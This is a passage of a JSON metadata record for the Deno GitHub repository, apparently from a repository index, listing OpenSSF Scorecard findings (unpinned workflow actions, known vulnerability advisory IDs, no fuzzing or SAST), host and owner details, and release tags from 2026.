.github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","m